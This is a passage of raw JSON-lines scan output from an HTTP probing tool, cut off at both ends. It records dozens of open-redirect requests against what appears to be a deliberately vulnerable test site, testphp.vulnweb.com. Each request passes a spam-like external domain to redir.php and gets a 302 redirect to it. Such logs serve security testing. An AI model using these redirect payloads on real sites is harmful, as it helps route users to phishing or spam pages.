ype\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//evtosysmadasen.ml/143testphpvulnwebcomSzi651\",\"time\":\"343.308659ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.914726835Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//forweisubsgisro.cf/180testphpvulnwebcomfFz649\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//forweisubsgisro.cf/180testphpvulnwebcomfFz649\",\"location\":\"//forweisubsgisro.cf/180testphpvulnwebcomfFz649\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//forweisubsgisro.cf/180testphpvulnwebcomfFz649\",\"time\":\"350.720618ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.994742462Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//fracurrhod.tk/143testphpvulnwebcomcYSRne351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//fracurrhod.tk/143testphpvulnwebcomcYSRne351\",\"location\":\"//fracurrhod.tk/143testphpvulnwebcomcYSRne351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//fracurrhod.tk/143testphpvulnwebcomcYSRne351\",\"time\":\"342.352989ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:09.076067505Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//hltn2te.cyou/143testphpvulnwebcomzuYMRH351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//hltn2te.cyou/143testphpvulnwebcomzuYMRH351\",\"location\":\"//hltn2te.cyou/143testphpvulnwebcomzuYMRH351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//hltn2te.cyou/143testphpvulnwebcomzuYMRH351\",\"time\":\"346.883564ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:12.304060953Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//imimsorti.ga/143testphpvulnwebcomCyihlm351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//imimsorti.ga/143testphpvulnwebcomCyihlm351\",\"location\":\"//imimsorti.ga/143testphpvulnwebcomCyihlm351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//imimsorti.ga/143testphpvulnwebcomCyihlm351\",\"time\":\"345.976115ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:12.438218441Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//jackdocttsit.ga/143testphpvulnwebcomyqGXcm351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//jackdocttsit.ga/143testphpvulnwebcomyqGXcm351\",\"location\":\"//jackdocttsit.ga/143testphpvulnwebcomyqGXcm351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//jackdocttsit.ga/143testphpvulnwebcomyqGXcm351\",\"time\":\"343.070633ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:12.556876448Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//kandbinsoself.ml/143testphpvulnwebcomiLNdhP351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//kandbinsoself.ml/143testphpvulnwebcomiLNdhP351\",\"location\":\"//kandbinsoself.ml/143testphpvulnwebcomiLNdhP351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//kandbinsoself.ml/143testphpvulnwebcomiLNdhP351\",\"time\":\"351.750581ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:12.586457326Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//kingviljumplu.ga/143testphpvulnwebcomDyAPKE351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//kingviljumplu.ga/143testphpvulnwebcomDyAPKE351\",\"location\":\"//kingviljumplu.ga/143testphpvulnwebcomDyAPKE351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//kingviljumplu.ga/143testphpvulnwebcomDyAPKE351\",\"time\":\"341.610275ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:12.951165958Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//knobofsaterf.tk/143testphpvulnwebcomrZOmIt351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//knobofsaterf.tk/143testphpvulnwebcomrZOmIt351\",\"location\":\"//knobofsaterf.tk/143testphpvulnwebcomrZOmIt351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//knobofsaterf.tk/143testphpvulnwebcomrZOmIt351\",\"time\":\"357.736948ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:13.364773352Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//lagerena.ml/143testphpvulnwebcomJsCaGf351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//lagerena.ml/143testphpvulnwebcomJsCaGf351\",\"location\":\"//lagerena.ml/143testphpvulnwebcomJsCaGf351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//lagerena.ml/143testphpvulnwebcomJsCaGf351\",\"time\":\"352.406465ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:13.372064189Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//lahamenxaly.cf/113testphpvulnwebcomsjq651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//lahamenxaly.cf/113testphpvulnwebcomsjq651\",\"location\":\"//lahamenxaly.cf/113testphpvulnwebcomsjq651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//lahamenxaly.cf/113testphpvulnwebcomsjq651\",\"time\":\"339.270731ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:13.579206985Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//miparale.gq/143testphpvulnwebcomfNIzvw351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//miparale.gq/143testphpvulnwebcomfNIzvw351\",\"location\":\"//miparale.gq/143testphpvulnwebcomfNIzvw351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//miparale.gq/143testphpvulnwebcomfNIzvw351\",\"time\":\"356.575982ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:14.097225612Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//naisnowesbryn.ml/180testphpvulnwebcomYNn649\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//naisnowesbryn.ml/180testphpvulnwebcomYNn649\",\"location\":\"//naisnowesbryn.ml/180testphpvulnwebcomYNn649\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//naisnowesbryn.ml/180testphpvulnwebcomYNn649\",\"time\":\"355.287627ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:14.200915681Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//ncorbeltnessprofec.tk/143testphpvulnwebcomYnhHSq351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//ncorbeltnessprofec.tk/143testphpvulnwebcomYnhHSq351\",\"location\":\"//ncorbeltnessprofec.tk/143testphpvulnwebcomYnhHSq351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//ncorbeltnessprofec.tk/143testphpvulnwebcomYnhHSq351\",\"time\":\"347.719899ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:15.860578742Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//nmxt044.cyou/180-testphpvulnwebcomUSN651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//nmxt044.cyou/180-testphpvulnwebcomUSN651\",\"location\":\"//nmxt044.cyou/180-testphpvulnwebcomUSN651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//nmxt044.cyou/180-testphpvulnwebcomUSN651\",\"time\":\"350.96851ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:17.162060876Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//ntitaccusensetors.ml/113testphpvulnwebcomUxd651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//ntitaccusensetors.ml/113testphpvulnwebcomUxd651\",\"location\":\"//ntitaccusensetors.ml/113testphpvulnwebcomUxd651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//ntitaccusensetors.ml/113testphpvulnwebcomUxd651\",\"time\":\"339.858131ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:17.174176634Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//orimcidevi.tk/143testphpvulnwebcomAROMTS351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//orimcidevi.tk/143testphpvulnwebcomAROMTS351\",\"location\":\"//orimcidevi.tk/143testphpvulnwebcomAROMTS351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//orimcidevi.tk/143testphpvulnwebcomAROMTS351\",\"time\":\"338.017134ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:17.51521061Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//pearliaterra.ml/143testphpvulnwebcomXqN651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//pearliaterra.ml/143testphpvulnwebcomXqN651\",\"location\":\"//pearliaterra.ml/143testphpvulnwebcomXqN651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//pearliaterra.ml/143testphpvulnwebcomXqN651\",\"time\":\"356.604852ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:18.374623587Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//plumposmincparbea.tk/113testphpvulnwebcomhIy651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//plumposmincparbea.tk/113testphpvulnwebcomhIy651\",\"location\":\"//plumposmincparbea.tk/113testphpvulnwebcomhIy651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//plumposmincparbea.tk/113testphpvulnwebcomhIy651\",\"time\":\"348.763898ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:18.401512066Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//podifdireri.tk/143testphpvulnwebcomQehLaB351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//podifdireri.tk/143testphpvulnwebcomQehLaB351\",\"location\":\"//podifdireri.tk/143testphpvulnwebcomQehLaB351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//podifdireri.tk/143testphpvulnwebcomQehLaB351\",\"time\":\"360.487484ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:18.441129375Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//pondtinglove.ml/113testphpvulnwebcomINd651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//pondtinglove.ml/113testphpvulnwebcomINd651\",\"location\":\"//pondtinglove.ml/113testphpvulnwebcomINd651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//pondtinglove.ml/113testphpvulnwebcomINd651\",\"time\":\"357.880694ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:18.445638468Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//ppdiv.com/143testphpvulnwebcomYiSTob351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//ppdiv.com/143testphpvulnwebcomYiSTob351\",\"location\":\"//ppdiv.com/143testphpvulnwebcomYiSTob351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//ppdiv.com/143testphpvulnwebcomYiSTob351\",\"time\":\"356.675337ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:18.770141141Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//rilapsaco.tk/143testphpvulnwebcomGNHDRB351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//rilapsaco.tk/143testphpvulnwebcomGNHDRB351\",\"location\":\"//rilapsaco.tk/143testphpvulnwebcomGNHDRB351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//rilapsaco.tk/143testphpvulnwebcomGNHDRB351\",\"time\":\"344.236839ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:18.803898585Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//rtificarimorac.ga/113testphpvulnwebcomQsH651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//rtificarimorac.ga/113testphpvulnwebcomQsH651\",\"location\":\"//rtificarimorac.ga/113testphpvulnwebcomQsH651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//rtificarimorac.ga/113testphpvulnwebcomQsH651\",\"time\":\"352.72104ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:18.805603224Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//suzukiami.com/143testphpvulnwebcomJUoEvC351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//suzukiami.com/143testphpvulnwebcomJUoEvC351\",\"location\":\"//suzukiami.com/143testphpvulnwebcomJUoEvC351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//suzukiami.com/143testphpvulnwebcomJUoEvC351\",\"time\":\"355.36956ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:18.876908198Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//tageganocy.cf/180-testphpvulnwebcomXhL651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//tageganocy.cf/180-testphpvulnwebcomXhL651\",\"location\":\"//tageganocy.cf/180-testphpvulnwebcomXhL651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//tageganocy.cf/180-testphpvulnwebcomXhL651\",\"time\":\"357.080195ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:18.916011744Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//teifetverppeditan.tk/143testphpvulnwebcomXnEKNx351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//teifetverppeditan.tk/143testphpvulnwebcomXnEKNx351\",\"location\":\"//teifetverppeditan.tk/143testphpvulnwebcomXnEKNx351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//teifetverppeditan.tk/143testphpvulnwebcomXnEKNx351\",\"time\":\"342.451946ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:19.043044471Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//tunhaylowatgu.tk/143testphpvulnwebcomYpkwRK351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//tunhaylowatgu.tk/143testphpvulnwebcomYpkwRK351\",\"location\":\"//tunhaylowatgu.tk/143testphpvulnwebcomYpkwRK351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//tunhaylowatgu.tk/143testphpvulnwebcomYpkwRK351\",\"time\":\"352.908757ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:19.085765928Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//tutide.tk/143testphpvulnwebcomBcLqoA351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//tutide.tk/143testphpvulnwebcomBcLqoA351\",\"location\":\"//tutide.tk/143testphpvulnwebcomBcLqoA351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//tutide.tk/143testphpvulnwebcomBcLqoA351\",\"time\":\"356.695377ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:19.13879075Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//volcesu.tk/143testphpvulnwebcomnBPFlG351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//volcesu.tk/143testphpvulnwebcomnBPFlG351\",\"location\":\"//volcesu.tk/143testphpvulnwebcomnBPFlG351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//volcesu.tk/143testphpvulnwebcomnBPFlG351\",\"time\":\"343.446532ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:19.181880094Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//zdqklv.cyou/143testphpvulnwebcommhqElI351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//zdqklv.cyou/143testphpvulnwebcommhqElI351\",\"location\":\"//zdqklv.cyou/143testphpvulnwebcommhqElI351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//zdqklv.cyou/143testphpvulnwebcommhqElI351\",\"time\":\"339.345066ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:19.264185928Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//zrq63s15p.cfd/143testphpvulnwebcomuHFcTf351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//zrq63s15p.cfd/143testphpvulnwebcomuHFcTf351\",\"location\":\"//zrq63s15p.cfd/143testphpvulnwebcomuHFcTf351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//zrq63s15p.cfd/143testphpvulnwebcomuHFcTf351\",\"time\":\"347.520233ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:19.347445299Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=Biolinky.co/agenxionplay\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=Biolinky.co/agenxionplay\",\"location\":\"Biolinky.co/agenxionplay\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=Biolinky.co/agenxionplay\",\"time\":\"350.725864ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:19.426015336Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=Trendingquiz.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=Trendingquiz.com/\",\"location\":\"Trendingquiz.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/h